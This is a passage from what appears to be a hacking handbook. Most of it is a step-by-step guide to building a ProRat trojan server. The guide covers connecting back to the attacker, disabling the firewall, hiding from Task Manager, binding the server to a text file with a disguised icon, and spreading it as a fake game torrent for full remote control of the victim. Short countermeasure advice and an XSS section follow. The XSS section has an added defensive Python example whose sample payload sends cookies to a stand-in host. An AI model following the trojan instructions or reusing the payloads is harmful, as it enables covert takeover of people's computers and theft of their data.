Once it has downloaded, right-click the archive and choose to extract it; a password prompt comes up, so enter the archive password. Open the program. Next we create the actual Trojan file, the server. Put in your IP address so the server can connect back to you, and your e-mail address so that when a victim is infected it sends you a message. We will not be using the rest of the options.

Click General Settings to continue. Here we choose the port the server will connect through, the password you will be asked for when you connect to an infected victim, and the victim name.

As you can see, ProRat has the ability to disable the Windows firewall and hide itself from Task Manager. Click Bind with File to continue. Here you have the option to bind the Trojan server with another file. Remember, a Trojan can only run if a human runs it, so binding it with a legitimate file like a text document or a game raises the chance that someone clicks it. Check the bind option and select a file to bind it to; in the example I use an ordinary text document.

Click Server Extensions to continue. Here you choose what kind of server file to generate. Click Server Icon to continue. Here you choose an icon for the server file; the icon helps mask what the file actually is, so for my example I choose the regular text-document icon since my file is a text document. Finally click Create Server to, you guessed it, create the server file.

Below is what my server file looks like. A hacker could also put it up as a torrent pretending it is something else, like the latest game that just came out, to get people to download it. Now I will show you what happens when a victim installs the server on his computer and what the hacker can do next.

Once I run it, the Trojan installs itself on my computer in the background, and the hacker gets a message telling him I am infected. He connects to my computer by typing in my IP address and port and clicking Connect, is asked for the password he set when he created the server, and once he enters it he has full control of my computer.

Now the hacker has many options to choose from, as you can see on the right: he has access to all my files, can shut down my PC, pull all the saved passwords off my computer, send a message to my screen, format my whole hard drive, take a screenshot, and much more.

The image below shows the message I would get on my screen if the hacker chose to message me; below that is my taskbar after the hacker clicks Hide Start Button; and below that is what the hacker sees if he takes a screenshot of the victim's screen. Many skilled hackers write their own viruses and Trojans that easily bypass anti-virus programs. One caution the handbook does not mention: ready-made RAT builders downloaded from hacking sites are frequently backdoored themselves, so whoever runs the builder is often the first victim.

Countermeasures

There are a couple of things you can do to prevent yourself from being infected by the malware discussed in this chapter.

Make sure you have good, up-to-date anti-virus software installed, and if it has an automatic update option, make sure it is enabled. Make sure you have a firewall installed and that it is actually enabled: firewalls protect against unauthorized inbound and outbound connections, which is exactly what a Trojan like the one above needs in order to phone home. Above all, do not run files from untrusted sources, whatever their icon says they are.

Web Application Attacks

Most websites today are dynamic, driven by web applications, and many of the web applications that run these dynamic websites have security flaws. In this chapter we will discuss some of the most popular forms of attack against web applications.

Cross Site Scripting (XSS)

Local. Local XSS attacks are by far the rarest and the hardest to pull off. This attack requires an exploit for a browser vulnerability. With this type of attack the hacker can install worms, spambots and backdoors onto your computer.
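Cross-site scripting is the first web application flaw the chapter names, and the page's own list of attachments includes a whole ebook on it. The following added example (not code from the handbook) shows the flaw and its fix side by side: a comment renderer that concatenates user input into HTML, a hardened version that escapes for the context it writes into, and a small parser-based detector that checks rendered output for injected tags, event handlers and javascript: URLs. It also shows why context matters, by placing an escaped value into an unquoted attribute, where html.escape alone is not enough. The page fragments and payloads are constructed.

```python
"""Added example (not from the handbook): a comment renderer that is
vulnerable to cross-site scripting beside a hardened version, with a small
detector that checks rendered output for injected tags and handlers.  The
page fragments and payloads are constructed; this is not any real site."""
import html
from html.parser import HTMLParser

ALLOWED_TAGS = {"div", "b", "a"}   # the only tags the templates themselves emit


def render_comment_vulnerable(username, comment):
    """Concatenates user input straight into the page, so the browser treats
    anything in it that looks like HTML as HTML."""
    return f"<div class='comment'><b>{username}</b>: {comment}</div>"


def render_comment_safe(username, comment):
    """Escapes every user-controlled value for the HTML text context."""
    return (f"<div class='comment'><b>{html.escape(username)}</b>: "
            f"{html.escape(comment)}</div>")


def render_title_unquoted(title):
    """Escaped but placed in an unquoted attribute: spaces are not escaped,
    so the value can still grow a second attribute.  Context matters."""
    return f"<a title={html.escape(title)} href='/profile'>profile</a>"


def render_title_quoted(title):
    """Same value inside a quoted attribute with quotes escaped: safe."""
    return f'<a title="{html.escape(title, quote=True)}" href="/profile">profile</a>'


class InjectionDetector(HTMLParser):
    """Flags tags the templates never emit, on* event handlers and javascript: URLs."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.findings.append(f"tag:{tag}")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"handler:{name}")
            if name in ("href", "src") and value and value.strip().lower().startswith("javascript:"):
                self.findings.append(f"url:{name}")


def detect_injection(rendered):
    """Return the list of injection findings in a rendered fragment."""
    detector = InjectionDetector()
    detector.feed(rendered)
    detector.close()
    return detector.findings


if __name__ == "__main__":
    # Constructed payloads: cookie theft via <script>, and an event handler.
    payloads = ['<script>new Image().src="http://evil.example/?c="+document.cookie</script>',
                '<img src=x onerror=alert(1)>']
    for p in payloads:
        print("vulnerable:", detect_injection(render_comment_vulnerable("mallory", p)))
        print("safe      :", detect_injection(render_comment_safe("mallory", p)))
    attr = "x onmouseover=alert(1)"
    print("unquoted  :", detect_injection(render_title_unquoted(attr)))
    print("quoted    :", detect_injection(render_title_quoted(attr)))
```

The detector is a review aid, not a defence: the fix is escaping every untrusted value for the exact context it lands in (text, quoted attribute, URL, script), which is what the safe renderers do.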